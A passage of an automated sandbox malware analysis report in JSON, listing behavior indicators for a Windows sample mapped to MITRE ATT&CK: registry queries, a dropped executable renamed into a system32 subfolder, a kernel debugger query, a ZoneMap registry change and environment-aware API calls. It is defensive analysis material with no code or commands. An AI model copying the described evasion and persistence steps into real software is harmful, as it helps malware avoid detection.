\"HKLM\\SYSTEM\\ControlSet001\\services\\WinSock2\\Parameters\\NameSpace_Catalog5\" (Filter: 1; Subtree: 0)\n \"netsh.exe\" monitors \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\" (Filter: 5; Subtree: 1)\n \"svchost.exe\" monitors \"\\REGISTRY\\USER\\.DEFAULT\\Control Panel\\International\" (Filter: 4; Subtree: 1)\n \"svchost.exe\" monitors \"HKLM\\SYSTEM\\ControlSet001\\services\\WinSock2\\Parameters\\Protocol_Catalog9\" (Filter: 1; Subtree: 0)\n \"svchost.exe\" monitors \"HKLM\\SYSTEM\\ControlSet001\\services\\WinSock2\\Parameters\\NameSpace_Catalog5\" (Filter: 1; Subtree: 0)", "origin": "API Call", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Caches\"\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" touched file \"%LOCALAPPDATA%\\Microsoft\\Windows\\Caches\"\n \"svchost.exe\" touched file \"C:\\Windows\\system32\\config\\systemprofile:.repos\"\n \"svchost.exe\" touched file \"C:\\Windows\\system32\\config\\systemprofile\\Local Settings:.repos\"\n \"svchost.exe\" touched file \"C:\\Windows\\TEMP\\wincookie.repos\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"PREFERREDUILANGUAGES\"; Value: \"\")\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\"; Key: \"MACHINEPREFERREDUILANGUAGES\"; Value: \"\")\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"PREFEREXTERNALMANIFEST\"; Value: \"\")\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"SAFEDLLSEARCHMODE\"; Value: \"\")\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\"; Key: \"SUPPRESSIONPOLICY\"; Value: \"\")\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{04731B67-D933-450A-90E6-4ACD2E9408FE}\"; Key: \"SUPPRESSIONPOLICY\"; Value: \"\")\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\"; Key: \"SUPPRESSIONPOLICY\"; Value: \"\")\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{11016101-E366-4D22-BC06-4ADA335C892B}\"; Key: \"SUPPRESSIONPOLICY\"; Value: \"\")\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\"; Key: \"SUPPRESSIONPOLICY\"; Value: \"\")\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\INPROCSERVER32\"; Key: \"\"; Value: \"\")\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\INPROCSERVER32\"; Key: \"LOADWITHOUTCOM\"; Value: \"\")\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\COM3\"; Key: \"COM+ENABLED\"; Value: \"\")\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\"; Key: \"\"; Value: \"\")\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\INPROCSERVER32\"; Key: \"INPROCSERVER32\"; Value: \"\")\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\INPROCSERVER32\"; Key: \"THREADINGMODEL\"; Value: \"\")\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"MAXSXSHASHCOUNT\"; Value: \"\")\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\INTERNET EXPLORER\\EUPP PROTECTED - IT IS A VIOLATION OF WINDOWS POLICY TO MODIFY. SEE AKA.MS/BROWSERPOLICY\"; Key: \"FIRSTRUNCOMPLETE\"; Value: \"\")\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\DATACOLLECTION\"; Key: \"COMMERCIALDATAOPTIN\"; Value: \"\")\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"CREATEURICACHESIZE\"; Value: \"\")\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"CREATEURICACHESIZE\"; Value: \"\")\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"CREATEURICACHESIZE\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" trying to touch file \"C:\\dbghelp.dll\"\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" trying to touch file \"C:\\Windows\\system32\\dbghelp.dll\"\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" trying to touch file \"C:\\msvcr100.dll\"\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" trying to touch file \"C:\\Windows\\system32\\msvcr100.dll\"\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" trying to touch file \"pipe\\uqyipjlp\"\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" trying to touch file \"C:\\\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" trying to access non-existent file \"pipe\\uqyipjlp\"\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" trying to access non-existent file \"C:\\71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe.Local\\\"\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" trying to access non-existent file \"C:\\Windows\\System32\\cmd.exe:Zone.Identifier\"\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" trying to access non-existent file \"C:\\Windows\\System32\\sc.exe:Zone.Identifier\"\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" trying to access non-existent file \"C:\\Windows\\System32\\netsh.exe:Zone.Identifier\"\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" trying to access non-existent file \"C:\\71CAF290168C22D29D9D2C3E2702A0B0E7C7F44B5CEEE88EB7FAB1C6E7058E9F.EXE.LOCAL\"\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" trying to access non-existent file \"C:\\Windows\\System32\\cmd.exe:ZONE.IDENTIFIER\"\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" trying to access non-existent file \"C:\\Windows\\System32\\sc.exe:ZONE.IDENTIFIER\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\temp\\nhhyjsjl.exe\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"nhhyjsjl.exe.67EE49B9.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"nhhyjsjl.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%TEMP%\\nhhyjsjl.exe]- [targetUID: 00000000-00004512]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-162", "type": 6, "relevance": 1, "name": "Renames files", "description": "\"cmd.exe\" renamed original file\"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\nhhyjsjl.exe\" to \"%WINDIR%\\system32\\zvdnuoqu\\nhhyjsjl.exe\"", "origin": "API Call", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-9", "type": 6, "relevance": 4, "name": "Queries process information", "description": "\"netsh.exe\" queried SystemProcessInformation at 00000000-00002444-00000105-617521 [PID: 2444]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00002444-00000105-1318164 [PID: 2444]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00002444-00000105-3246870 [PID: 2444]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00002444-00000105-3454964 [PID: 2444]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00002444-00000105-4326874 [PID: 2444]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00002444-00000105-4556466 [PID: 2444]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00002444-00000105-5266543 [PID: 2444]\n \"svchost.exe\" queried SystemProcessInformation at 00000000-00002980-00000105-112058 [PID: 2980]", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "module-16", "type": 10, "relevance": 3, "name": "Loads the debugger/analysis tool module", "description": "\"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" loaded module \"%WINDIR%\\System32\\dbghelp.dll\" at 6E990000\n \"nhhyjsjl.exe\" loaded module \"%WINDIR%\\System32\\dbghelp.dll\" at 6E990000\n \"svchost.exe\" loaded module \"%WINDIR%\\System32\\dbghelp.dll\" at 6E990000", "origin": "Loaded Module", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-10", "type": 6, "relevance": 6, "name": "Queries kernel debugger information", "description": "\"netsh.exe\" at 00000000-00002444-00000105-7754094", "origin": "API Call", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "registry-179", "type": 3, "relevance": 1, "name": "Tries to map intranet network resources to internet zone", "description": "\"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"UNCASINTRANET\"; Value: \"00000000\")", "origin": "Registry Access", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-39", "type": 6, "relevance": 8, "name": "Queries volume information of an entire harddrive", "description": "\"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" queries volume information of \"C:\\\" at 00000000-00004512-0000010C-1339800\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" queries volume information of \"C:\\\" at 00000000-00004512-0000010C-1341013\n \"nhhyjsjl.exe\" queries volume information of \"C:\\\" at 00000000-00002928-0000010C-1849897\n \"nhhyjsjl.exe\" queries volume information of \"C:\\\" at 00000000-00002928-0000010C-1851285\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00002980-0000010C-62371\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00002980-0000010C-982516\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00002980-0000010C-1476963\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00002980-0000010C-1478367", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310000c0a71e003cfc3b00145c5077435c507708fd3b000100000094011c0001000000bcfb3b00935c517740835877d4a05077e1447a7708fd3b000100000001000000f0ff1e00000000008cfb3b00bcfb3b0028fc3b0095e14c77a5bb1100feffffffd4a050771bbe46750000617700000000 (UID: 00000000-00004512)\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001c5c4f7743794675ffffffff0c0000004c624f771f794675ffffffff0c00000064ec120004000000000400000100000078ec12000a0e2c0000000000 (UID: 00000000-00004512)\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031006a0600000088ea7b75ecf91200b344146a88000000000000000000000000000000000000000000000000000000880000000000000000000000000000002c6b40001092cfb9bcf51200616b400088000000f822410081a87b75ecf912000000900100dedd0000020000080000004c2c5f00 (UID: 00000000-00004512)\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004512)\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8ebad75402024000030fd7f9a5c517700e0fd7fb0c97b014430fd7f00000000400000003f000000250000000030fd7fa4c97b01c15c517760825877250000000030fd7f9a5c517700e0fd7fc8c97b01578950778083587713174775d8ebad75 (UID: 00000000-00004512)\n \"sc.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000078971100ccf84400145c5077435c507798f944000100000094010f00010000004cf84400935c517740835877d4a050773c1e057798f94400010000000100000060e41100000000001cf844004cf84400b8f8440095e14c7788e21100feffffffd4a050771bbe46750000617700000000 (UID: 00000000-00001376)\n \"sc.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000078973200d4fb6800145c5077435c5077a0fc680001000000940130000100000054fb6800935c517740835877d4a050771d172977a0fc68000100000001000000c8e432000000000024fb680054fb6800c0fb680095e14c77b1e81100feffffffd4a050771bbe46750000617700000000 (UID: 00000000-00004608)\n \"sc.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310000b8de1f00fcf65000145c5077435c5077c8f750000100000094011d00010000007cf65000935c517740835877d4a05077f9021177c8f75000010000000100000048e41f00000000004cf650007cf65000e8f6500095e14c777df01100feffffffd4a050771bbe46750000617700000000 (UID: 00000000-00004836)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-147", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve local language", "description": "\"cmd.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00004672)", "origin": "API Call", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00004512)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-225", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve the host name of a computer", "description": "\"svchost.exe\" called \"gethostname\" with parameter %OSUSER%-PC & 128 (UID: 00000000-00002980)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "stream-39", "type": 1, "relevance": 10, "name": "Makes a code branch decision directly after an API that is environment aware", "description": "Found API call GetTimeZoneInformation@KERNEL32.DLL directly followed by \"cmp eax, 02h\" and \"jne 0040B33Dh\" at 00000000-00004512-40052-269-0040B211", "origin": "Hybrid Analysis Technology", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-142", "type": 6, "relevance": 3, "name": "Calls an API possibly used to retrieve a handle to the foreground window", "description": "\"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" called \"GetForegroundWindow\" (UID: 00000000-00004512)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-55", "type": 3, "relevance": 10, "name": "Reads the registry for installed applications", "description": "\"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\NETSH.EXE\")\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\NETSH.EXE\")\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\CMD.EXE\")\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\CMD.EXE\")\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\SC.EXE\")\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\SC.EXE\")", "origin": "Registry Access", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-148", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve account information for specified SID", "description": "\"netsh.exe\" called \"LookupAccountSidW\" with param Name %OSUSER% (UID: 00000000-00002444)", "origin": "API Call", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-11", "type": 6, "relevance": 2, "name": "Queries volume information", "description": "\"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" queries volume information of \"C:\\\" at 00000000-00004512-0000010C-1339800\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" queries volume information of \"C:\\\" at 00000000-00004512-0000010C-1341013\n \"nhhyjsjl.exe\" queries volume information of \"C:\\\" at 00000000-00002928-0000010C-1849897\n \"nhhyjsjl.exe\" queries volume information of \"C:\\\" at 00000000-00002928-0000010C-1851285\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00002980-0000010C-62371\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00002980-0000010C-982516\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00002980-0000010C-1476963\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00002980-0000010C-1478367", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000e8001c020000000000000000000000000000000000000500e3001c020000000000000000000008701c000000000020000000000000000000000078491e00f86c1c00186e1c00b8c81e00c0711c0000000000ccf93b000000000028fc3b0095e14c774da31100feffffffff2b50779a2a507764c56677b69f5077000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000020000000000000064c56677b8c81e0064c56677 (UID: 00000000-00004512)\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004512)\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004512)\n 